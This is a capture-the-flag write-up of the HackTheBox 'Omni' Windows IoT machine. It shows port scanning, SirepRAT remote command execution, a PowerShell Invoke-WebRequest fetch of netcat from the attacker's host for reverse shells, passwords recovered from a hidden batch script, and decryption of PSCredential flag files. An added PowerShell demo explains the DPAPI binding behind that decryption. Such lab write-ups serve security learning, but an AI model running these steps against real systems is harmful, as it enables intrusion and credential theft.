CTF-Writeups/HackTheBox/Omni.md
AbdullahRizwan101 91a33260e1
Update Omni.md
2020-11-16 18:41:07 -05:00


HackTheBox-Omni

NMAP

Host is up (0.21s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=11/16%Time=5FB29B69%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x
SF:04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\
SF:xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 355.84 seconds

PORT 8080

The site asked me for credentials, so I googled the default password for Windows Device Portal:

User Name: Administrator, password: p@ssw0rd

But the credentials I found on Google didn't work.

Then I learned that this is an IoT box, and I found a repository on GitHub containing a script that acts as a RAT (Remote Access Trojan):

https://github.com/SafeBreach-Labs/SirepRAT

I tried running the commands from the repository. Note that you need to install the hexdump module for Python 2, because the script only works with Python 2.

So our RAT is working perfectly!

Now let's try to craft a backdoor to get a reverse shell and start a Metasploit listener.

But this didn't work.

Let's try to upload a netcat binary by hosting it on our local machine and fetching it with PowerShell: Invoke-WebRequest -Uri $ip -OutFile $filepath

So it did get transferred to the target box.

It looks like this version of netcat is not compatible, so I tried again by uploading netcat64.exe, and we got a hit.

So let's keep our fingers crossed and hope we get a reverse shell.

And we got it :D

Here we can see that there are 3 drives. We are on the C drive, whereas on the D drive we can see the app and administrator folders, but we are not able to access them; the D drive is formatted in a way that we cannot access it.

By using dir /a we can see the hidden folder (we could also have used PowerShell's ls -la, but this still gets the job done). Reading the contents of r.bat, we see the two users we suspected; what net user is doing here is changing the password of both users, and the script also deletes that account, in a loop:

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

I don't think we can switch users the way we do in Linux, or at least I don't know how; I tried googling and pasting commands, but it didn't work. So I assumed this would be the password for the Windows Device Portal that we saw in the beginning.

Once I got into the application, I looked around to see what I could do with it and found where I can run system commands.

Now, to see which user we are, I tried running whoami, which failed, but when I ran echo %username% it showed that I'm Administrator. So let's find a way to get a shell from here.

We already uploaded nc64.exe to C:\Windows\Temp.

We can't simply read the contents of user.txt and root.txt, because they are stored as a PowerShell credential object, a PSCredential object.

In order to decrypt user.txt we need to be logged in as the user who owns user.txt, and for root.txt we need to be Administrator. Since we are Administrator, let's decrypt that flag first, and then we will switch to the app user.

First we import the file into an object:

$file = Import-Clixml -Path U:\Users\administrator\root.txt

If it gives no errors, the command ran successfully. Then:

$file.GetNetworkCredential().password

This uses the object to call a method that reveals the stored password.
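As an added illustration (not part of the original writeup), the following PowerShell shows what Export-Clixml actually does with a PSCredential and why the Import-Clixml step above only works for the account that saved the file: the SecureString is wrapped with DPAPI under the saving user's profile, so the plaintext never sits on disk and another user (or another machine) cannot unwrap it. The path, user name and secret are constructed for the demo.

```powershell
# Added example (not from the writeup): PSCredential round-trip through
# Export-Clixml / Import-Clixml, and the DPAPI user binding behind it.
# $path, 'demo-user' and the secret value are constructed for this demo.

$path = Join-Path $env:TEMP 'demo-cred.xml'

# Build a credential from a constructed sample secret and save it.
# Export-Clixml protects the SecureString with DPAPI (current user scope).
$secret = ConvertTo-SecureString 'S3cretValue-demo' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('demo-user', $secret)
$cred | Export-Clixml -Path $path

# The file holds only an opaque DPAPI blob in the <SS> element, not the plaintext.
$plaintextOnDisk = Select-String -Path $path -Pattern 'S3cretValue' -Quiet
"Plaintext present in file: $plaintextOnDisk"        # False

# Re-import under the same account: the blob is unwrapped transparently,
# which is exactly what the writeup does with root.txt / user.txt.
$loaded = Import-Clixml -Path $path
"UserName : $($loaded.UserName)"                      # demo-user
"Password : $($loaded.GetNetworkCredential().Password)"  # S3cretValue-demo

# What Import-Clixml does under the hood: pull the hex blob out of <SS> and hand
# it to ConvertTo-SecureString with no -Key, i.e. DPAPI unprotect. Run by any
# other user (or copied to another machine) this throws a CryptographicException,
# which is the property the writeup relies on when it switches to the app user.
try {
    $raw  = [xml](Get-Content -Path $path -Raw)
    $blob = $raw.Objs.Obj.Props.SS.'#text'
    ConvertTo-SecureString -String $blob | Out-Null
    'DPAPI unprotect succeeded: same user profile as the one that saved the file'
} catch [System.Security.Cryptography.CryptographicException] {
    'DPAPI unprotect failed: different user or machine'
}

Remove-Item -Path $path -ErrorAction SilentlyContinue
```

The takeaway for anyone storing credentials this way is that Export-Clixml is a per-user, per-machine convenience, not portable encryption: it stops other accounts from reading the secret, but any code running as the saving user can recover it with a single GetNetworkCredential() call.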

Now, for the app user, I'm going to log in as that user through the Windows Device Portal, run the netcat binary, and capture the reverse shell.

In order to do that, since there was no logout option on the portal, I had to clear all of the browser's data and then log in with the password we found for app.

I tried running the nc64.exe binary, but it gave access denied, so I uploaded the binary to the Public directory on the C drive instead.

And finally we have a shell as app.

And we got the user flag as well.

This link was really helpful for decrypting the password (or in this case, the flag): https://www.travisgan.com/2015/06/powershell-password-encryption.html